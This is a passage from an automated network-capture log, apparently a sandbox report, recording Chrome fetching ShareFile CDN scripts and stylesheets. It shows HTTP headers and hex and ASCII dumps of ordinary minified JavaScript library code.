                                                                                                                                                                                                                      Data Ascii: 292-6.763L17.427 2H2zm1.432.012v4.347h2.114V3.493H3.432zm3.547.314v4.662l1.012 3.802 1.025 3.843c.01.036.043.042.258.042.645 0 1.243-.246 1.704-.7.445-.437.712-1 .773-1.633.015-.164.024-.963.024-2.196v-1.939h4.104c2.257 0 4.103-.008 4.102-.018s-.802-2.379
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6f 6e 51 75 65 72 79 55 70 64 61 74 65 28 65 29 7d 29 29 2c 74 68 69 73 2e 63 61 63 68 65 2e 6e 6f 74 69 66 79 28 7b 71 75 65 72 79 3a 74 68 69 73 2c 74 79 70 65 3a 22 75 70 64 61 74 65 64 22 2c 61 63 74 69 6f 6e 3a 65 7d 29 7d 29 29 7d 7d 63 6c 61 73 73 20 7a 20 65 78 74 65 6e 64 73 20 61 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 71 75 65 72 69 65 73 3d 5b 5d 2c 74 68 69 73 2e 71 75 65 72 69 65 73 4d 61 70 3d 7b 7d 7d 62 75 69 6c 64 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 63 6f 6e 73 74 20 69 3d 74 2e 71 75 65 72 79 4b 65 79 2c 61 3d 6e 75 6c 6c 21 3d 28 72 3d 74 2e 71 75 65 72 79 48 61 73 68 29 3f 72 3a 67
                                                                                                                                                                                                                      Data Ascii: .forEach((t=>{t.onQueryUpdate(e)})),this.cache.notify({query:this,type:"updated",action:e})}))}}class z extends a{constructor(e){super(),this.config=e||{},this.queries=[],this.queriesMap={}}build(e,t,n){var r;const i=t.queryKey,a=null!=(r=t.queryHash)?r:g
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 74 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 69 6e 64 4d 61 74 63 68 69 6e 67 4f 62 73 65 72 76 65 72 73 28 65 29 2e 6d 61 70 28 28 65 3d 3e 65 2e 6f 62 73 65 72 76 65 72 2e 67 65 74 4f 70 74 69 6d 69 73 74 69 63 52 65 73 75 6c 74 28 65 2e 64 65 66 61 75 6c 74 65 64 51 75 65 72 79 4f 70 74 69 6f 6e 73 29 29 29 7d 66 69 6e 64 4d 61 74 63 68 69 6e 67 4f 62 73 65 72 76 65 72 73 28 65 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 2c 6e 3d 65 2e 6d 61 70 28 28 65 3d 3e 74 68 69 73 2e 63 6c 69 65 6e 74 2e 64 65 66 61 75 6c 74 51 75 65 72 79 4f 70 74 69 6f 6e 73 28 65 29 29 29 2c 72 3d 6e 2e 66 6c 61 74 4d 61 70 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 74 2e 66 69 6e 64 28 28 74 3d 3e 74 2e 6f 70 74 69 6f 6e 73 2e 71 75 65 72
                                                                                                                                                                                                                      Data Ascii: t(e){return this.findMatchingObservers(e).map((e=>e.observer.getOptimisticResult(e.defaultedQueryOptions)))}findMatchingObservers(e){const t=this.observers,n=e.map((e=>this.client.defaultQueryOptions(e))),r=n.flatMap((e=>{const n=t.find((t=>t.options.quer
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 65 55 52 4c 26 26 30 3d 3d 3d 76 2e 72 65 73 70 6f 6e 73 65 55 52 4c 2e 69 6e 64 65 78 4f 66 28 22 66 69 6c 65 3a 22 29 29 26 26 73 65 74 54 69 6d 65 6f 75 74 28 77 29 7d 2c 76 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 26 26 28 6e 28 6e 65 77 20 64 28 22 52 65 71 75 65 73 74 20 61 62 6f 72 74 65 64 22 2c 64 2e 45 43 4f 4e 4e 41 42 4f 52 54 45 44 2c 65 2c 76 29 29 2c 76 3d 6e 75 6c 6c 29 7d 2c 76 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 28 6e 65 77 20 64 28 22 4e 65 74 77 6f 72 6b 20 45 72 72 6f 72 22 2c 64 2e 45 52 52 5f 4e 45 54 57 4f 52 4b 2c 65 2c 76 2c 76 29 29 2c 76 3d 6e 75 6c 6c 7d 2c 76 2e 6f 6e 74 69 6d 65 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 2e 74 69 6d 65 6f 75 74 3f 22 74
                                                                                                                                                                                                                      Data Ascii: eURL&&0===v.responseURL.indexOf("file:"))&&setTimeout(w)},v.onabort=function(){v&&(n(new d("Request aborted",d.ECONNABORTED,e,v)),v=null)},v.onerror=function(){n(new d("Network Error",d.ERR_NETWORK,e,v,v)),v=null},v.ontimeout=function(){var t=e.timeout?"t
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 26 26 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 55 69 6e 74 38 41 72 72 61 79 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 62 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 69 73 41 72 72 61 79 3a 6c 2c 69 73 41 72 72 61 79 42 75 66 66 65 72 3a 75 2c 69 73 42 75 66 66 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26 26 21 63 28 65 29 26 26 6e 75 6c 6c 21 3d 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 63 28 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 63 6f 6e 73 74 72
                                                                                                                                                                                                                      Data Ascii: "undefined"!=typeof Uint8Array&&Object.getPrototypeOf(Uint8Array),function(e){return b&&e instanceof b});e.exports={isArray:l,isArrayBuffer:u,isBuffer:function(e){return null!==e&&!c(e)&&null!==e.constructor&&!c(e.constructor)&&"function"==typeof e.constr
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 4c 6f 63 61 74 69 6f 6e 7d 3d 7b 7d 29 7b 73 75 70 65 72 28 65 29 2c 74 68 69 73 2e 5f 62 69 74 61 70 53 65 61 72 63 68 3d 6e 65 77 20 78 28 65 2c 7b 6c 6f 63 61 74 69 6f 6e 3a 74 2c 74 68 72 65 73 68 6f 6c 64 3a 6e 2c 64 69 73 74 61 6e 63 65 3a 72 2c 69 6e 63 6c 75 64 65 4d 61 74 63 68 65 73 3a 69 2c 66 69 6e 64 41 6c 6c 4d 61 74 63 68 65 73 3a 61 2c 6d 69 6e 4d 61 74 63 68 43 68 61 72 4c 65 6e 67 74 68 3a 73 2c 69 73 43 61 73 65 53 65 6e 73 69 74 69 76 65 3a 6f 2c 69 67 6e 6f 72 65 4c 6f 63 61 74 69 6f 6e 3a 6c 7d 29 7d 73 74 61 74 69 63 20 67 65 74 20 74 79 70 65 28 29 7b 72 65 74 75 72 6e 22 66 75 7a 7a 79 22 7d 73 74 61 74 69 63 20 67 65 74 20 6d 75 6c 74 69 52 65 67 65 78 28 29 7b 72 65 74 75 72 6e 2f 5e 22 28 2e 2a 29 22 24 2f 7d 73 74 61 74 69 63
                                                                                                                                                                                                                      Data Ascii: Location}={}){super(e),this._bitapSearch=new x(e,{location:t,threshold:n,distance:r,includeMatches:i,findAllMatches:a,minMatchCharLength:s,isCaseSensitive:o,ignoreLocation:l})}static get type(){return"fuzzy"}static get multiRegex(){return/^"(.*)"$/}static
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 22 7d 29 2c 28 30 2c 72 2e 59 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 33 37 2e 37 31 39 20 32 30 38 2e 39 32 43 32 33 37 2e 37 31 39 20 32 30 38 2e 39 32 20 32 32 38 2e 38 34 34 20 32 30 33 2e 36 33 35 20 32 32 36 2e 35 33 34 20 31 39 39 2e 39 35 35 43 32 32 32 2e 36 36 39 20 31 39 33 2e 37 39 35 20 32 31 36 2e 35 38 34 20 31 37 38 2e 33 35 20 32 31 36 2e 35 38 34 20 31 37 38 2e 33 35 43 32 31 36 2e 35 38 34 20 31 37 38 2e 33 35 20 32 31 37 2e 37 39 39 20 31 37 35 2e 38 20 32 31 35 2e 38 35 34 20 31 37 31 2e 34 33 35 43 32 31 33 2e 39 31 34 20 31 36 37 2e 30 36 35 20 32 31 30 2e 37 39 39 20 31 35 37 2e 36 30 35 20 32 30 38 2e 36 39 34 20 31 35 38 2e 35 37 35 43 32 30 36 2e 37 35 39 20 31 35 39 2e 34 36 35 20 32 31 31 2e 38 38 39 20 31 37 31 2e 34 35
                                                                                                                                                                                                                      Data Ascii: "}),(0,r.Y)("path",{d:"M237.719 208.92C237.719 208.92 228.844 203.635 226.534 199.955C222.669 193.795 216.584 178.35 216.584 178.35C216.584 178.35 217.799 175.8 215.854 171.435C213.914 167.065 210.799 157.605 208.694 158.575C206.759 159.465 211.889 171.45


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      66192.168.2.174978413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC609OUTGET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 650980
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 22 Aug 2024 14:51:30 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:14 GMT
                                                                                                                                                                                                                      ETag: "d46761310b3c627cc468f3b845e55eca"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 23776effa8a63b2e2dccd702e73b0c86.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: Jr-hdDq233DOD1U55lYSdzUraP2HgclL_JYibcuJ4Qg2hZYFYSCkPQ==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 69 6e 74 65 67 72 61 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 73
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.s
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6e 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 57 69 74 68 43 6f 64 65 28 6c 2c 75 5b 32 5d 2c 65 2c 6f 29 7d 29 29 5b 22 63 61 74 63 68 22 5d 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 46 6f 72 6d 73 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2c 61 28 74 29 7d 29 29 2c 21 30 29 3a 28 64 2e 61 64 64 51 75 65 72 79 28 7b 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 64 2e 68 72 65 66 28 29 29 2c 21 30 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 75 74 68 65 6e 74 69 63 61 74 65 57 69 74 68 54 6f 6b 65 6e 46 72 6f 6d 52 65 64 69 72 65 63 74 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                      Data Ascii: nAuthenticationWithCode(l,u[2],e,o)}))["catch"]((function(t){delete e.pendingFormsAuthentication,a(t)})),!0):(d.addQuery({redirect_url:window.location.toString()}),window.location.replace(d.href()),!0)},e.prototype.authenticateWithTokenFromRedirect=functi
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 48 65 61 64 65 72 4e 61 6d 65 3a 22 58 2d 58 53 52 46 2d 54 4f 4b 45 4e 22 2c 6d 61 78 43 6f 6e 74 65 6e 74 4c 65 6e 67 74 68 3a 2d 31 2c 6d 61 78 42 6f 64 79 4c 65 6e 67 74 68 3a 2d 31 2c 65 6e 76 3a 7b 46 6f 72 6d 44 61 74 61 3a 6e 28 38 31 30 29 7d 2c 76 61 6c 69 64 61 74 65 53 74 61 74 75 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 3d 32 30 30 26 26 65 3c 33 30 30 7d 2c 68 65 61 64 65 72 73 3a 7b 63 6f 6d 6d 6f 6e 3a 7b 41 63 63 65 70 74 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2c 20 74 65 78 74 2f 70 6c 61 69 6e 2c 20 2a 2f 2a 22 7d 7d 7d 3b 6f 2e 66 6f 72 45 61 63 68 28 5b 22 64 65 6c 65 74 65 22 2c 22 67 65 74 22 2c 22 68 65 61 64 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 70 2e 68 65 61 64 65 72 73 5b 65
                                                                                                                                                                                                                      Data Ascii: HeaderName:"X-XSRF-TOKEN",maxContentLength:-1,maxBodyLength:-1,env:{FormData:n(810)},validateStatus:function(e){return e>=200&&e<300},headers:{common:{Accept:"application/json, text/plain, */*"}}};o.forEach(["delete","get","head"],(function(e){p.headers[e
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 2c 61 29 7c 7c 7b 7d 3b 72 3f 43 28 73 2c 6e 2c 6f 29 3a 73 3d 52 28 52 28 7b 7d 2c 73 29 2c 6e 29 2c 49 28 74 68 69 73 2e 64 61 74 61 2c 61 2c 73 29 2c 69 2e 73 69 6c 65 6e 74 7c 7c 74 68 69 73 2e 65 6d 69 74 28 22 61 64 64 65 64 22 2c 65 2c 74 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 6d 6f 76 65 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 28 65 2c 74 29 26 26 64 65 6c 65 74 65 20 74 68 69 73 2e 64 61 74 61 5b 65 5d 5b 74 5d 2c 74 68 69 73 2e 72 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 74 68 69 73 2e 65 6d 69 74 28 22 72 65 6d 6f 76 65 64 22 2c 65 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 73 52 65 73 6f 75 72
                                                                                                                                                                                                                      Data Ascii: ,a)||{};r?C(s,n,o):s=R(R({},s),n),I(this.data,a,s),i.silent||this.emit("added",e,t,n)}},{key:"removeResourceBundle",value:function(e,t){this.hasResourceBundle(e,t)&&delete this.data[e][t],this.removeNamespaces(t),this.emit("removed",e,t)}},{key:"hasResour
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 75 6d 62 65 72 28 30 21 3d 3d 65 29 7d 2c 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 32 3d 3d 65 3f 31 3a 33 3d 3d 65 3f 32 3a 33 29 7d 2c 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 65 25 31 30 3e 3d 32 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 30 21 3d 3d 65 3f 31 3a 32 29 7d 2c 31 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 7c 7c 65 25 31
                                                                                                                                                                                                                      Data Ascii: umber(0!==e)},14:function(e){return Number(1==e?0:2==e?1:3==e?2:3)},15:function(e){return Number(e%10==1&&e%100!=11?0:e%10>=2&&(e%100<10||e%100>=20)?1:2)},16:function(e){return Number(e%10==1&&e%100!=11?0:0!==e?1:2)},17:function(e){return Number(1==e||e%1
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 69 63 65 73 2e 75 74 69 6c 73 26 26 74 68 69 73 2e 73 65 72 76 69 63 65 73 2e 75 74 69 6c 73 2e 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 26 26 21 74 68 69 73 2e 73 65 72 76 69 63 65 73 2e 75 74 69 6c 73 2e 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 28 74 29 3f 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 27 64 69 64 20 6e 6f 74 20 73 61 76 65 20 6b 65 79 20 22 27 2e 63 6f 6e 63 61 74 28 6e 2c 27 22 20 61 73 20 74 68 65 20 6e 61 6d 65 73 70 61 63 65 20 22 27 29 2e 63 6f 6e 63 61 74 28 74 2c 27 22 20 77 61 73 20 6e 6f 74 20 79 65 74 20 6c 6f 61 64 65 64 27 29 2c 22 54 68 69 73 20 6d 65 61 6e 73 20 73 6f 6d 65 74 68 69 6e 67 20 49 53 20 57 52 4f 4e 47 20 69 6e 20 79 6f 75 72 20 73 65 74 75 70 2e 20 59 6f 75 20 61 63 63 65 73 73
                                                                                                                                                                                                                      Data Ascii: ices.utils&&this.services.utils.hasLoadedNamespace&&!this.services.utils.hasLoadedNamespace(t)?this.logger.warn('did not save key "'.concat(n,'" as the namespace "').concat(t,'" was not yet loaded'),"This means something IS WRONG in your setup. You access
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 28 74 68 69 73 2c 65 29 7d 72 65 74 75 72 6e 20 72 28 65 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 68 61 73 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 68 65 78 28 65 2e 6d 64 35 31 28 74 29 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 64 35 63 79 63 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3d 74 5b 30 5d 2c 6f 3d 74 5b 31 5d 2c 69 3d 74 5b 32 5d 2c 61 3d
                                                                                                                                                                                                                      Data Ascii: n(){function e(){!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,e)}return r(e,null,[{key:"hash",value:function(t){return e.hex(e.md51(t))}},{key:"md5cycle",value:function(t,n){var r=t[0],o=t[1],i=t[2],a=
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 7c 62 79 7c 63 61 6c 63 4d 6f 64 65 7c 63 61 70 48 65 69 67 68 74 7c 63 6c 69 70 7c 63 6c 69 70 50 61 74 68 55 6e 69 74 73 7c 63 6c 69 70 50 61 74 68 7c 63 6c 69 70 52 75 6c 65 7c 63 6f 6c 6f 72 49 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 7c 63 6f 6c 6f 72 49 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 46 69 6c 74 65 72 73 7c 63 6f 6c 6f 72 50 72 6f 66 69 6c 65 7c 63 6f 6c 6f 72 52 65 6e 64 65 72 69 6e 67 7c 63 6f 6e 74 65 6e 74 53 63 72 69 70 74 54 79 70 65 7c 63 6f 6e 74 65 6e 74 53 74 79 6c 65 54 79 70 65 7c 63 75 72 73 6f 72 7c 63 78 7c 63 79 7c 64 7c 64 65 63 65 6c 65 72 61 74 65 7c 64 65 73 63 65 6e 74 7c 64 69 66 66 75 73 65 43 6f 6e 73 74 61 6e 74 7c 64 69 72 65 63 74 69 6f 6e 7c 64 69 73 70 6c 61 79 7c 64 69 76 69 73 6f 72 7c 64 6f 6d 69 6e 61 6e 74 42 61 73
                                                                                                                                                                                                                      Data Ascii: |by|calcMode|capHeight|clip|clipPathUnits|clipPath|clipRule|colorInterpolation|colorInterpolationFilters|colorProfile|colorRendering|contentScriptType|contentStyleType|cursor|cx|cy|d|decelerate|descent|diffuseConstant|direction|display|divisor|dominantBas
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6f 75 6e 74 28 29 2c 68 2e 73 74 6f 72 65 2e 73 75 62 73 63 72 69 62 65 28 68 2e 73 74 61 74 65 29 2c 68 2e 73 74 6f 72 65 2e 61 63 74 69 76 61 74 65 28 74 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 68 2e 73 74 61 74 65 2e 6f 6e 55 6e 6d 6f 75 6e 74 28 29 2c 68 2e 73 74 6f 72 65 2e 75 6e 73 75 62 73 63 72 69 62 65 28 68 2e 73 74 61 74 65 29 2c 68 2e 73 74 6f 72 65 2e 64 65 61 63 74 69 76 61 74 65 28 29 7d 7d 29 2c 5b 5d 29 3b 63 3d 68 2e 73 74 61 74 65 2e 73 65 6c 66 28 29 3b 72 65 74 75 72 6e 20 68 5b 22 5b 68 6f 6f 6b 73 74 61 74 65 28 6c 6f 63 61 6c 29 5d 22 5d 3d 63 2c 63 7d 76 61 72 20 6d 2c 67 3d 53 79 6d 62 6f 6c 28 22 73 65 6c 66 22 29 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 5b 65 2e 53 74 61 74 65 55 73 65 64 49 6e 44 65 70 65 6e 64 65 6e 63 79
                                                                                                                                                                                                                      Data Ascii: ount(),h.store.subscribe(h.state),h.store.activate(t),function(){h.state.onUnmount(),h.store.unsubscribe(h.state),h.store.deactivate()}}),[]);c=h.state.self();return h["[hookstate(local)]"]=c,c}var m,g=Symbol("self");!function(e){e[e.StateUsedInDependency
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 6c 65 6e 67 74 68 22 2c 7b 76 61 6c 75 65 3a 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 7d 29 2c 4f 62 6a 65 63 74 28 72 29 3d 3d 3d 72 3f 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 28 72 29 3a 69 7c 7c 72 3d 3d 3d 6c 3f 5b 5d 3a 5b 22 76 61 6c 75 65 22 2c 22 70 61 74 68 22 5d 7d 2c 61 70 70 6c 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 69 3f 6d 2e 41 70 70 6c 79 5f 53 74 61 74 65 3a 6d 2e 41 70 70 6c 79 5f 56 61 6c 75 65 29 7d 2c 63 6f 6e 73 74 72 75 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 61 28 69 3f 6d 2e
                                                                                                                                                                                                                      Data Ascii: defineProperty(t,"length",{value:0,writable:!0,enumerable:!1,configurable:!1}),Object(r)===r?Object.getOwnPropertyNames(r):i||r===l?[]:["value","path"]},apply:function(e,t,n){return a(i?m.Apply_State:m.Apply_Value)},construct:function(e,t,n){return a(i?m.


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      67192.168.2.174978713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC574OUTGET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:23 GMT
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 09:27:42 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4cc2a0a7eb7d5483edc69be298297f9e.cloudfront.net (CloudFront)
